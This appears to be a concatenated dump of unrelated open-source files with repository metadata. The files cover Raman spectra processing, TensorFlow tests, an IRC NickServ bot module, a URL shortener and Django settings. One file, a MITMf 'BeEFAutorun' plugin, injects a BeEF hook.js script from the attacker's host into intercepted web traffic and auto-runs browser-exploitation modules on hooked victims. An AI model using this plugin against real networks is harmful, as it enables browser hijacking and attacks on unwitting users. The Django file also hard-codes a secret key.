row_list = sorted(
row_list, key=og, reverse=bool(column_name in desc_columns))
else:
row_list.sort(key=og, reverse=bool(column_name in desc_columns))
return row_list
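# Worked example of the reverse-index stable sort above (rows are hypothetical):
# sorting [(2, 'b'), (1, 'a'), (2, 'a')] with sort_columns=('x', 'y') first
# stable-sorts by column 1, then by column 0, giving
# [(1, 'a'), (2, 'a'), (2, 'b')]; putting 'x' in desc_columns reverses only the
# first key, giving [(2, 'a'), (2, 'b'), (1, 'a')].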
| theskyinflames/bpulse-go-client | vendor/github.com/youtube/vitess/py/vtdb/vtgate_cursor.py | Python | apache-2.0 | 9,742 | 0.005646 |
import sys,os, pickle, numpy, pylab, operator, itertools
import cv2
from shutil import copy as copyfile
from PyQt4.QtCore import *
from PyQt4.QtGui import *
import matplotlib.pyplot as plt
from DataParseApp import dataparseDialog
from sklearn.decomposition import NMF
projectpath=os.path.split(os.path.abspath(__file__))[0]
sys.path.append(os.path.join(projectpath,'ui'))
pythoncodepath=os.path.split(projectpath)[0]
jcapdataprocesspath=os.path.join(pythoncodepath, 'JCAPDataProcess')
sys.path.append(jcapdataprocesspath)
from VisualizeDataApp import visdataDialog
sys.path.append(os.path.join(jcapdataprocesspath,'AuxPrograms'))
from fcns_ui import *
from fcns_io import *
platemapvisprocesspath=os.path.join(pythoncodepath, 'JCAPPlatemapVisualize')
sys.path.append(platemapvisprocesspath)
from plate_image_align_Dialog import plateimagealignDialog
import numpy as np
###############UPDATE THIS TO BE THE FOLDER CONTAINING parameters.py
paramsfolder=r'K:\users\hte\Raman\39664\20170607analysis_tippy-top_1mmblobs'
#paramsfolder=r'K:\users\hte\Raman\33444\20170608analysis'
#if not paramsfolder is None:
sys.path.append(paramsfolder)
from parameters import *
#else:
# plateidstr='3344'
#
# pathd={'ramanfile':r'K:\users\hte\Raman\33444\HSS_33444_map-1-_CRR-EM-copy.txt'}
# pathd['mainfolder']=os.path.split(pathd['ramanfile'])[0]
# pathd['savefolder']=os.path.join(pathd['mainfolder'], '20170607analysis')
# pathd['infopck']=pathd['ramanfile'][:-4]+'__info.pck'
# pathd['allspectra']=os.path.join(pathd['savefolder'],'allspectra.npy')
# pathd['nmfdata']=os.path.join(pathd['savefolder'],'nmf4.pck')
# pathd['edges']=os.path.join(pathd['savefolder'],'edges.png')
# pathd['mapfill']=os.path.join(pathd['savefolder'],'blobmap.png')
# pathd['blobd']=os.path.join(pathd['savefolder'],'blobd.pck')
# pathd['alignedsamples']=os.path.join(pathd['savefolder'],'alignedsamples.png')
# pathd['alignedsamplestxt']=os.path.join(pathd['savefolder'],'alignedsamples.txt')
# pathd['spectrafolder']=os.path.join(pathd['savefolder'],'sample_spectra')
# pathd['map']=os.path.join(pathd['spectrafolder'],'raman_sample_index_map.map')
# pathd['samplepixels']=os.path.join(pathd['spectrafolder'],'samplepixels.png')
# pathd['udibasepath']=os.path.join(pathd['savefolder'],'ave_rmn_')
#
# udi_ternary_projection_inds=[0, 1, 2]#only used for the all.udi file
#
# sample_list=[1850,1851,1852,1853,1854,1855,1905,1906,1907,1908,1909,1910,1911,1912,1913,1914,1915,1916,1917,1918,1919,1969,1970,1971,1972,1973,1974,1975,1976,1977,1978,1979,1980,1981,1982,1983,2033,2034,2035,2036,2037,2038,2039,2040,2041,2042,2043,2044,2045,2046,2047,2097,2098,2099,2100,2101,2102,2103,2104,2105,2106,2107,2108,2109,2110,2111]
# dx_smp=1.
# dy_smp=1.
#
# default_sample_blob_dict=dict({}, \
# smp_is_square=0, smp_width=1., bcknd_is_square=0, bcknd_min_width=1.3, bcknd_max_width=1.4, removedups=1\
# )
#
# show_help_messages=True
platemappath=getplatemappath_plateid(plateidstr)
if not os.path.isdir(pathd['mainfolder']):
print 'NOT A VALID FOLDER'
if not os.path.isdir(pathd['savefolder']):
os.mkdir(pathd['savefolder'])
if not os.path.isdir(pathd['spectrafolder']):
os.mkdir(pathd['spectrafolder'])
class MainMenu(QMainWindow):
def __init__(self, previousmm, execute=True, **kwargs):
super(MainMenu, self).__init__(None)
self.parseui=dataparseDialog(self, title='Visualize ANA, EXP, RUN data', **kwargs)
self.alignui=plateimagealignDialog(self, manual_image_init_bool=False)
if execute:
self.parseui.exec_()
def doNMF(datan,n_components=4):
# from Mitsu
    #alternatively PCA ... might be faster
nmf=NMF(n_components=n_components,init='nndsvd')
data_decomp_all=nmf.fit_transform(datan)
data_components_all=nmf.components_
return data_decomp_all,data_components_all
def rgb_comp(arr2d, affine=True):
cmy_cmyk=lambda a:a[:3]*(1.-a[3])+a[3]
rgb_cmy=lambda a:1.-a
rgb_cmyk=lambda a:rgb_cmy(cmy_cmyk(a))
return numpy.array([rgb_cmyk(a) for a in arr2d])
def imGen(data_decomp_all,ramaninfod,cmykindeces=[3, 2, 1, 0]):
cmykvals=copy.copy(data_decomp_all[:, cmykindeces])
cmykvals/=cmykvals.max(axis=0)[numpy.newaxis, :]
img=numpy.reshape(rgb_comp(cmykvals), (ramaninfod['xshape'], ramaninfod['yshape'], 3))
return img
def findEdges(img_gray, sigma = 0.33):
#this uses automatic thresholding from one of the cv2 tutorials
v = np.median(img_gray[img_gray>0])
lower = int(max(0, (1.0 - sigma) * v))
upper = int(min(255, (1.0 + sigma) * v))
edges = cv2.Canny(np.uint8(img_gray),lower,upper)
return edges
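# Illustrative thresholds for findEdges above (assumed values): with the default
# sigma = 0.33 and a median grey level v = 120, lower = int(0.67 * 120) = 80 and
# upper = int(1.33 * 120) = 159, so cv2.Canny keeps edges between those bounds.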
def findContours(edges):
#the contours are now found by searching the most external convex hull
    #this way most of the not fully closed samples are detected as well
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
iWithContour = cv2.drawContours(edges, contours, -1, (255,20,100), 5)
mapimage = np.zeros_like(edges)
#this fills the contours
for i in range(len(contours)):
cv2.drawContours(mapimage, contours, i, color=255, thickness=-1)
#this is to calculate the center of each contour
x=[]
y=[]
for c in contours:
# compute the center of the contour
M = cv2.moments(c)
try:
x.append(M['m10']/(M['m00']))
y.append(M['m01']/(M['m00']))
except:
            #this was necessary as the divisor is sometimes 0
            #yields good results but should be done with caution
x.append(M['m10']/(M['m00']+1e-23))
y.append(M['m01']/(M['m00']+1e-23))
return iWithContour, mapimage, contours, x, y
mainapp=QApplication(sys.argv)
form=MainMenu(None, execute=False)
#form.show()
#form.setFocus()
#mainapp.exec_()
parseui=form.parseui
alignui=form.alignui
parseui.rawpathLineEdit.setText(pathd['ramanfile'])
parseui.infopathLineEdit.setText(pathd['infopck'])
parseui.getinfo(ramaninfop=pathd['infopck'], ramanfp=pathd['ramanfile'])#opens or creates
if os.path.isfile(pathd['allspectra']):
with open(pathd['allspectra'], mode='rb') as f:
fullramandataarray=numpy.load(f)
elif 1:
fullramandataarray=parseui.readfullramanarray(pathd['ramanfile'])#opens or creates
with open(pathd['allspectra'], mode='wb') as f:
numpy.save(f, fullramandataarray)
ramaninfod=parseui.ramaninfod
#parseui.exec_()
#ramaninfod['number of spectra']
#ramaninfod['xdata']
#ramaninfod['ydata']
#ramaninfod['Wavenumbers_str']
#ramaninfod['Spectrum 0 index']
ramaninfod['xdata']/=1000.
ramaninfod['ydata']/=1000.#convert to mm
ramaninfod['xshape']= len(np.unique(ramaninfod['xdata']))
ramaninfod['yshape']= len(np.unique(ramaninfod['ydata']))
ramaninfod['dx']= (ramaninfod['xdata'].max()-ramaninfod['xdata'].min())/(ramaninfod['xshape']-1)
ramaninfod['dy']= (ramaninfod['ydata'].max()-ramaninfod['ydata'].min())/(ramaninfod['yshape']-1)
nx=dx_smp/ramaninfod['dx']
ny=dy_smp/ramaninfod['dy']
ntot=nx*ny
ramanreshape=lambda arr: np.reshape(arr, (ramaninfod['xshape'], ramaninfod['yshape'])).T[::-1, ::-1]
ramannewshape=(ramaninfod['yshape'], ramaninfod['xshape'])
image_of_x=ramanreshape(ramaninfod['xdata'])
image_of_y=ramanreshape(ramaninfod['ydata'])
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].min(), ramaninfod['ydata'].max()]
#extent=[ramaninfod['xdata'].max(), ramaninfod['xdata'].min(), ramaninfod['ydata'].max(), ramaninfod['ydata'].min()]
extent=[image_of_x[0, 0], image_of_x[-1, -1], image_of_y[0, 0], image_of_y[-1, -1]]
def ramanimshow(im, **kwargs):
plt.imshow(im, origin='lower', interpolation='none', aspect=1, extent=extent, **kwargs)
if os.path.isfile(pathd['nmfdata']):
with open(pathd['nmfdata'], mode='rb') as f:
tempd=pickle.load(f)
data_decomp_all,data_components_all,rgbimagedata=[tempd[k] for k in 'data_decomp_all,data_components_all,rgbimagedata'.split(',')]
else:
data_decomp_all,data_components_all = doNMF(fullramandataarray,4)
#rgbimagedata=imGen(data_decomp_all,ramaninfod)
rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
for i, arr in enumerate(data_decomp_all[:, :3].T):
if nmf_scaling_algorithm_for_image=='scale_by_max':
arr/=arr.max()
elif nmf_scaling_algorithm_for_image=='scale_log_by_max':
arr[arr!=0]=numpy.log10(arr[arr!=0])
arr/=arr.max()
rgbimagedata[:, :, i]=np.array([ramanreshape(arr)])
tempd={}
tempd['data_decomp_all']=data_decomp_all
tempd['data_components_all']=data_components_all
tempd['rgbimagedata']=rgbimagedata
with open(pathd['nmfdata'], mode='wb') as f:
tempd=pickle.dump(tempd, f)
#plt.clf()
#rgbimagedata=np.zeros(ramannewshape+(3,), dtype='float32')
#for i, arr in enumerate(data_decomp_all[:, :3].T):
# arr[arr!=0]=numpy.log10(arr[arr!=0])
# rgbimagedata[:, :, i]=np.array([ramanreshape(arr/arr.max())])
#ramanimshow(rgbimagedata)
#plt.show()
if 1 and os.path.isfile(pathd['blobd']):
with open(pathd['blobd'], mode='rb') as f:
blobd=pickle.load(f)
else:
edges = np.zeros(ramannewshape, dtype='uint8')
searchforoptimalbool=isinstance(find_edges_sigma_value, list)
ltemp=find_edges_sigma_value if searchforoptimalbool else [find_edges_sigma_value]
plt.clf()
for sigmacount, sigmaval in enumerate(ltemp):
if searchforoptimalbool:
plt.subplot(2, len(find_edges_sigma_value), sigmacount+1)
for i in range(data_decomp_all.shape[1]):
if nmf_scaling_algorithm_for_edge=='scale_by_max':
datadecomptemp=data_decomp_all[:,i]/data_decomp_all[:,i].max()
elif nmf_scaling_algorithm_for_edge=='scale_log_by_max':
datadecomptemp=data_decomp_all[:,i]
datadecomptemp[datadecomptemp!=0]=numpy.log10(datadecomptemp[datadecomptemp!=0])
datadecomptemp/=datadecomptemp.max()
arr=np.uint8(ramanreshape(datadecomptemp)*254)
edgetemp=findEdges(arr, sigma=sigmaval)
# plt.imshow(edgetemp)
# plt.show()
edges[np.where(edgetemp>0)] = 244
ramanimshow(edges)
if searchforoptimalbool:
plt.subplot(2, len(find_edges_sigma_value), len(find_edges_sigma_value)+sigmacount+1)
else:
plt.savefig(pathd['edges'])
plt.clf()
im2, contours, hierarchy = cv2.findContours(edges, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_TC89_KCOS)
image_of_inds=ramanreshape(numpy.arange(ramaninfod['number of spectra']))
mapfill = np.zeros(ramannewshape, dtype='uint8')
blobd={}
l_mask=[cv2.drawContours(np.zeros(ramannewshape, dtype='uint8'), contours, i, color=1, thickness=-1) for i in range(len(contours))]
l_imageinds=[numpy.where(maski==1) for maski in l_mask]
l_xycen=np.array([[image_of_x[imageindsi].mean(), image_of_y[imageindsi].mean()] for imageindsi in l_imageinds])
indstomerge=sorted([(count2+count+1, count) for count, xy0 in enumerate(l_xycen[:-1]) for count2, xy1 in enumerate(l_xycen[count+1:]) if ((xy0-xy1)**2).sum()<(dx_smp**2+dy_smp**2)/5.])[::-1]
#indstomerge has highest index first so merge going down
for indhigh, indlow in indstomerge:
# imageinds=l_imageinds.pop(indhigh)
# mask=l_mask.pop(indhigh)
imageinds=l_imageinds[indhigh]
mask=l_mask[indhigh]
l_mask[indlow][imageinds]=1#update only the masks and then update everythign else afterwards
l_imageinds=[numpy.where(maskj==1) for maskj in l_mask]
l_xycen=np.array([[image_of_x[imageindsj].mean(), image_of_y[imageindsj].mean()] for imageindsj in l_imageinds])
for imageinds, mask in zip(l_imageinds, l_mask):
indsinblob=sorted(list(image_of_inds[imageinds]))
relx=(image_of_x[imageinds].max()-image_of_x[imageinds].min())/dx_smp
rely=(image_of_y[imageinds].max()-image_of_y[imageinds].min())/dy_smp
if relx<0.5 or relx>1.4 or rely<0.5 or rely>1.4 or len(indsinblob)<ntot*0.5 or len(indsinblob)>ntot*1.5:
print 'skipped blob that was %.2f, %.2f of expected size with %d pixels' %(relx, rely, len(indsinblob))
continue
if numpy.any(mapfill[imageinds]==1):
print 'overlapping blobs detected'
xc=image_of_x[imageinds].mean()
yc=image_of_y[imageinds].mean()
mapfill[imageinds]=1
blobd[(xc, yc)]=indsinblob
ramanimshow(mapfill)
if searchforoptimalbool:
plt.show()
else:
plt.savefig(pathd['mapfill'])
if show_help_messages:
messageDialog(form, 'The auto detected and cleaned up blobs will be shown.\nThis is an image using the Raman motor coordinates').exec_()
plt.show()
with open(pathd['blobd'], mode='wb') as f:
pickle.dump(blobd, f)
alignui.knownblobsdict=blobd
alignui.openAddFile(p=platemappath)
alignui.image=rgbimagedata
alignui.motimage_extent=extent #left,right,bottom,top in mm
alignui.reloadimagewithextent()
#alignui.plotw_motimage.axes.imshow(alignui.image, origin='lower', interpolation='none', aspect=1, extent=alignui.motimage_extent)
xarr, yarr=np.array(blobd.keys()).T
alignui.plotw_motimage.axes.plot(xarr, yarr, 'wx', ms=4)
alignui.plotw_motimage.fig.canvas.draw()
if show_help_messages:
messageDialog(form, 'NMF analysis done and now plotting NMF image\nwith identified samples marked +. User can choose sample_no and \nright click to add calibration points.\nDo this for at least 1 sample marked with +.').exec_()
alignui.exec_()
alignui.sampleLineEdit.setText(','.join(['%d' %smp for smp in sample_list]))
alignui.addValuesSample()
if show_help_messages:
messageDialog(form, 'sample_no for export have been added. Check that \nthere are no NaN and if there are manually add calibration points\nas necessary and then remove+re-add the NaN samples.').exec_()
alignui.exec_()
alignui.plotw_motimage.fig.savefig(pathd['alignedsamples'])
with open(pathd['alignedsamplestxt'], mode='w') as f:
f.write(str(alignui.browser.toPlainText()))
alignui.openpckinfo(p=pathd['infopck'])
alignui.infox/=1000.
alignui.infoy/=1000.
alignui.perform_genmapfile(p=pathd['map'], **default_sample_blob_dict)
mapfill2=np.zeros(ramaninfod['number of spectra'], dtype='uint8')
for smp, inds in alignui.smp_inds_list__map:
mapfill2[inds]=2 if smp>0 else 1
mapfill2=ramanreshape(mapfill2)
plt.clf()
ramanimshow(mapfill2, vmin=0, vmax=2, cmap='gnuplot')
plt.savefig(pathd['samplepixels'])
if show_help_messages:
messageDialog(form, 'The NMF-identified samples use custom blob shapes and\nthe rest of the requested samples use default sample shape, resulting\nin the following map of pixels that will be exported.').exec_()
plt.show()
parseui.savepathLineEdit.setText(pathd['spectrafolder'])
parseui.match(copypath=pathd['map'])
parseui.extract()
parseui.saveave()
#parseui.readresultsfolder()
if show_help_messages:
messageDialog(form, 'The .rmn files have now been saved, so you can use\nthis next dialog to visualize data or close it to generate\nthe .udi files and open in JCAPDataProcess Visualizer').exec_()
parseui.exec_()
#only initialize visdataDialog so only created when necessary
visui=visdataDialog(form, title='Visualize ANA, EXP, RUN data')
visui.openontheflyfolder(folderpath=pathd['spectrafolder'], plateidstr=plateidstr)
visui.BatchComboBox.setCurrentIndex(2)
visui.runbatchprocess()
savep=pathd['udibasepath']+'all.udi'
visui.get_xy_plate_info_browsersamples(saveudibool=True, ternary_el_inds_for_udi_export=udi_ternary_projection_inds, savep=savep)
for i, indstup in enumerate(itertools.combinations(range(len(visui.ellabels)), 3)):
excludeinds=[ind for ind in range(len(visui.ellabels)) if not ind in indstup]
inds_where_excluded_els_all_zero=numpy.where(visui.fomplotd['comps'][:, excludeinds].max(axis=1)==0)[0]
if len(inds_where_excluded_els_all_zero)==0:
continue
smplist=[visui.fomplotd['sample_no'][fomplotind] for fomplotind in inds_where_excluded_els_all_zero]
visui.remallsamples()
visui.addrem_select_fomplotdinds(remove=False, smplist=smplist)
savep=''.join([pathd['udibasepath']]+[visui.ellabels[ind] for ind in indstup]+['.udi'])
visui.get_xy_plate_info_browsersamples(saveudibool=True, ternary_el_inds_for_udi_export=indstup, savep=savep)
if show_help_messages:
messageDialog(form, 'udi files now saved and JCAPDataProcess\nVisualizer will be opened for your use.').exec_()
visui.exec_()
if show_help_messages:
messageDialog(form, 'There is nothing more to do and continuing will raise an error.').exec_()
errorattheend
| johnmgregoire/JCAPRamanDataProcess | PlateAlignViaEdge_v4.py | Python | bsd-3-clause | 16,899 | 0.016214 |
"""Tests for control_flow_ops.py."""
import tensorflow.python.platform
from tensorflow.core.framework import graph_pb2
from tensorflow.python.framework import ops
from tensorflow.python.framework.test_util import TensorFlowTestCase
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import standard_ops as tf
from tensorflow.python.platform import googletest
class GroupTestCase(TensorFlowTestCase):
def _StripNode(self, nd):
snode = graph_pb2.NodeDef(name=nd.name, op=nd.op, input=nd.input)
if nd.device:
snode.device = nd.device
return snode
def _StripGraph(self, gd):
"""Copy gd keeping only, node.name, node.op, node.input, and node.device."""
return graph_pb2.GraphDef(node=[self._StripNode(nd) for nd in gd.node])
def testGroup_NoDevices(self):
with ops.Graph().as_default() as g:
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
c = tf.constant(0, name="c")
tf.group(a.op, b.op, c.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
node { name: "a" op: "Const"}
node { name: "b" op: "Const"}
node { name: "c" op: "Const"}
node { name: "root" op: "NoOp" input: "^a" input: "^b" input: "^c" }
""", self._StripGraph(gd))
def testGroup_OneDevice(self):
with ops.Graph().as_default() as g:
with g.device("/task:0"):
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
tf.group(a.op, b.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
node { name: "a" op: "Const" device: "/task:0" }
node { name: "b" op: "Const" device: "/task:0" }
node { name: "root" op: "NoOp" input: "^a" input: "^b" device: "/task:0" }
""", self._StripGraph(gd))
def testGroup_MultiDevice(self):
with ops.Graph().as_default() as g:
with g.device("/task:0"):
a = tf.constant(0, name="a")
b = tf.constant(0, name="b")
with g.device("/task:1"):
c = tf.constant(0, name="c")
d = tf.constant(0, name="d")
with g.device("/task:2"):
tf.group(a.op, b.op, c.op, d.op, name="root")
gd = g.as_graph_def()
self.assertProtoEquals("""
node { name: "a" op: "Const" device: "/task:0"}
node { name: "b" op: "Const" device: "/task:0"}
node { name: "c" op: "Const" device: "/task:1"}
node { name: "d" op: "Const" device: "/task:1"}
node { name: "root/NoOp" op: "NoOp" input: "^a" input: "^b"
device: "/task:0" }
node { name: "root/NoOp_1" op: "NoOp" input: "^c" input: "^d"
device: "/task:1" }
node { name: "root" op: "NoOp" input: "^root/NoOp" input: "^root/NoOp_1"
device: "/task:2" }
""", self._StripGraph(gd))
class ShapeTestCase(TensorFlowTestCase):
def testShape(self):
with ops.Graph().as_default():
tensor = tf.constant([1.0, 2.0])
self.assertEquals([2], tensor.get_shape())
self.assertEquals([2],
control_flow_ops.with_dependencies(
[tf.constant(1.0)], tensor).get_shape())
if __name__ == "__main__":
googletest.main()
| liyu1990/tensorflow | tensorflow/python/ops/control_flow_ops_test.py | Python | apache-2.0 | 3,164 | 0.006953 |
#!/usr/bin/python3
'''
This is a * sort * of static method but is ugly since the
function is really global and not in the class.
'''
class Book:
num = 0
def __init__(self, price):
self.__price = price
Book.num += 1
def printit(self):
print('price is', self.__price)
def setPrice(self, newprice):
self.__price = newprice
def getNumBooks():
return Book.num
# lets create some books...
b1 = Book(14)
b2 = Book(13)
# lets access the static member and the static methods...
print('Book.num (direct access) is ', Book.num)
print('getNumBooks() is ', getNumBooks())
try:
print(b1.getNumBooks())
except AttributeError as e:
    print('no, cannot access the static method via the instance')
# access the static member through an instance...
print(b1.num)
print(b2.num)
b3 = Book(12)
print(b1.num)
print(b2.num)
print(b3.num)
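# For contrast, a minimal sketch (not part of the original example) of the same
# counter exposed as a real static method, callable from the class or from an
# instance; Book2 and its attributes are hypothetical names.
class Book2:
    num = 0
    def __init__(self, price):
        self.__price = price
        Book2.num += 1
    @staticmethod
    def getNumBooks():
        return Book2.num
b4 = Book2(10)
print('Book2.getNumBooks() is', Book2.getNumBooks())
print('b4.getNumBooks() is', b4.getNumBooks())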
| nonZero/demos-python | src/examples/short/object_oriented/static_method_1.py | Python | gpl-3.0 | 881 | 0.001135 |
# -*- coding: utf-8 -*-
import bot
import time
"""
load irc/auth/nickserv
nickserv set password hunter2
config set modules.nickserv.enabled True
config set modules.nickserv.ghost True
nickserv register [email protected]
nickserv verify register myaccount c0d3numb3r
nickserv identify
"""
class M_NickServ(bot.Module):
index = "nickserv"
def register(self):
self.addhook("recv", "recv", self.recv)
self.addhook("login", "login", self.login)
self.addhook("nickinuse", "433", self.nickinuse)
self.addsetting("=name", "")
self.addsetting("=password", "")
self.addsetting("enabled", False)
self.addsetting("auto", True)
self.addsetting("ghost", True)
self.lastns = ""
self.lastnstime = time.time()
self.ghosting = True
self.addcommand(self.register_c, "register",
"Register with NickServ.",
["[-name=account name]", "email"])
self.addcommand(self.verify_c, "verify register",
"Verify with NickServ.", ["account", "code"])
self.addcommand(self.identify_c, "identify",
"Identify with NickServ.", [])
self.addcommand(self.setp, "set password",
"Set the NickServ password.", ["password"])
self.addcommand(self.setn, "set name",
"Set the NickServ name.", ["[name]"])
def setn(self, context, args):
args.default("name", "")
self.setsetting("name", args.getstr("name"))
return "Set name to: %s" % self.getsetting('name')
def setp(self, context, args):
args.default("password", "")
self.setsetting("password", args.getstr("password"))
return "Set password to: %s" % self.getsetting('password')
def name(self):
return self.getsetting("name") or self.server.settings.get(
'server.user.nick')
def recv(self, context):
if context.user[0]:
if context.code('notice') and context.user[0].lower() == 'nickserv':
if context.reciever == self.server.nick:
if self.lastns and time.time() - self.lastnstime < 30:
self.server.sendto("NOTICE", self.lastns,
"NickServ -- %s" % (
context.text,
))
if self.ghosting:
self.server.setnick(self.server.wantnick)
self.ghosting = False
def nickinuse(self, r):
if (self.getsetting("enabled") and
self.getsetting("password") and self.getsetting("ghost")):
self.server.setnick(self.server.nick + "_")
self.server.sendto("PRIVMSG", "nickserv", "GHOST %s %s" % (
self.server.wantnick,
self.getsetting("password"),
))
self.ghosting = True
r.append(True)
def identify(self):
self.server.log("AUTH", "Identifying with NickServ.")
self.server.sendto("PRIVMSG", "nickserv", "IDENTIFY %s %s" % (
self.name(),
self.getsetting("password"),
))
def identify_c(self, context, args):
context.exceptrights(["admin"])
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.identify()
self.lastns = context.user[0]
self.lastnstime = time.time()
def register_c(self, context, args):
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.server.sendto("PRIVMSG", "nickserv", "REGISTER %s %s %s" % (
self.name() if args.getbool('name') else '',
self.getsetting("password"),
args.getstr('email'),
))
self.lastns = context.user[0]
self.lastnstime = time.time()
def verify_c(self, context, args):
if not self.getsetting("enabled"):
return "NickServ is disabled."
if not self.getsetting("password"):
return "There is no password set."
self.server.sendto("PRIVMSG", "nickserv", "VERIFY REGISTER %s %s" % (
args.getstr('account'),
args.getstr('code'),
))
self.lastns = context.user[0]
self.lastnstime = time.time()
def login(self):
if self.getsetting("enabled") and self.getsetting("password"):
if self.getsetting("auto"):
self.identify()
bot.register.module(M_NickServ)
| shacknetisp/vepybot | plugins/protocols/irc/auth/nickserv.py | Python | mit | 4,789 | 0.000418 |
#!/usr/bin/env python2.7
# Copyright (c) 2014-2016 Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#
import logging
import sys
import json
import threading
from time import sleep
from core.beefapi import BeefAPI
from core.utils import SystemConfig, shutdown
from plugins.plugin import Plugin
from plugins.Inject import Inject
mitmf_logger = logging.getLogger("mitmf")
class BeefAutorun(Inject, Plugin):
name = "BeEFAutorun"
optname = "beefauto"
desc = "Injects BeEF hooks & autoruns modules based on Browser and/or OS type"
version = "0.3"
has_opts = False
def initialize(self, options):
self.options = options
self.ip_address = SystemConfig.getIP(options.interface)
Inject.initialize(self, options)
self.tree_info.append("Mode: {}".format(self.config['BeEFAutorun']['mode']))
beefconfig = self.config['MITMf']['BeEF']
self.html_payload = '<script type="text/javascript" src="http://{}:{}/hook.js"></script>'.format(self.ip_address, beefconfig['beefport'])
self.beef = BeefAPI({"host": beefconfig['beefip'], "port": beefconfig['beefport']})
if not self.beef.login(beefconfig['user'], beefconfig['pass']):
shutdown("[BeEFAutorun] Error logging in to BeEF!")
def startThread(self):
self.autorun()
def onConfigChange(self):
self.initialize(self.options)
def autorun(self):
already_ran = []
already_hooked = []
while True:
mode = self.config['BeEFAutorun']['mode']
for hook in self.beef.hooked_browsers.online:
if hook.session not in already_hooked:
mitmf_logger.info("{} [BeEFAutorun] Joined the horde! [id:{}, type:{}-{}, os:{}]".format(hook.ip, hook.id, hook.name, hook.version, hook.os))
already_hooked.append(hook.session)
self.black_ips.append(hook.ip)
if mode == 'oneshot':
if hook.session not in already_ran:
self.execModules(hook)
already_ran.append(hook.session)
elif mode == 'loop':
self.execModules(hook)
sleep(10)
sleep(1)
def execModules(self, hook):
all_modules = self.config['BeEFAutorun']["ALL"]
targeted_modules = self.config['BeEFAutorun']["targets"]
if all_modules:
mitmf_logger.info("{} [BeEFAutorun] Sending generic modules".format(hook.ip))
for module, options in all_modules.iteritems():
for m in self.beef.modules.findbyname(module):
resp = m.run(hook.session, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
else:
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
sleep(0.5)
if (hook.name and hook.os):
for os in targeted_modules:
if (os == hook.os) or (os in hook.os):
mitmf_logger.info("{} [BeEFAutorun] Sending targeted modules".format(hook.ip))
for browser in targeted_modules[os]:
if browser == hook.name:
for module, options in targeted_modules[os][browser].iteritems():
for m in self.beef.modules.findbyname(module):
resp = m.run(hook.session, json.loads(options))
if resp["success"] == 'true':
mitmf_logger.info('{} [BeEFAutorun] Sent module {}'.format(hook.ip, m.id))
else:
mitmf_logger.info('{} [BeEFAutorun] Error sending module {}'.format(hook.ip, m.id))
sleep(0.5)
| zhuyue1314/MITMf | plugins/BeefAutorun.py | Python | gpl-3.0 | 3,993 | 0.022039 |
import logging
from abc import abstractmethod, ABCMeta
from urllib import request
class UrlShortener(metaclass=ABCMeta):
@abstractmethod
def shorten(self, url: str) -> str:
pass
def log(self, url):
logging.info("Short URL: {}".format(url))
class Off(UrlShortener):
def shorten(self, url: str):
return url
class TinyURL(UrlShortener):
def shorten(self, url: str) -> str:
response = request.urlopen("http://tinyurl.com/api-create.php?url={}".format(url))
url = str(response.read(), encoding="ascii")
self.log(url)
return url
def get_url_shortener(name: str) -> UrlShortener:
if name == "tinyurl":
return TinyURL()
return Off()
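# Minimal usage sketch (assumed call site, not part of the original module):
# any name other than "tinyurl" falls back to the pass-through Off shortener.
if __name__ == "__main__":
    shortener = get_url_shortener("tinyurl")
    print(shortener.shorten("https://example.com/some/long/path"))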
| instantshare/instantshare | src/tools/shorturl.py | Python | gpl-2.0 | 726 | 0.001377 |
"""
Django settings for cadasta project.
Generated by 'django-admin startproject' using Django 1.8.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.8/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.8/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
from django.utils.translation import ugettext_lazy as _
from .languages import FORM_LANGS # noqa
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.8/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '@=fy$)xx+6yjo*us@&+m6$14@l-s6#atg(msm=9%)9@%b7l%h('
ALLOWED_HOSTS = ['*']
AUTH_USER_MODEL = 'accounts.User'
SITE_ID = 1
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites',
'django.contrib.gis',
'django.contrib.humanize',
'corsheaders',
'core',
'geography',
'accounts',
'organization',
'spatial',
'questionnaires',
'resources',
'buckets',
'party',
'xforms',
'search',
'tasks',
'django_filters',
'crispy_forms',
'parsley',
'widget_tweaks',
'django_countries',
'leaflet',
'rest_framework',
'rest_framework_gis',
'rest_framework.authtoken',
'rest_framework_docs',
'djoser',
'tutelary',
'allauth',
'allauth.account',
'allauth.socialaccount',
'sass_processor',
'simple_history',
'jsonattrs',
'compressor',
'django_otp',
)
MIDDLEWARE_CLASSES = (
'corsheaders.middleware.CorsMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
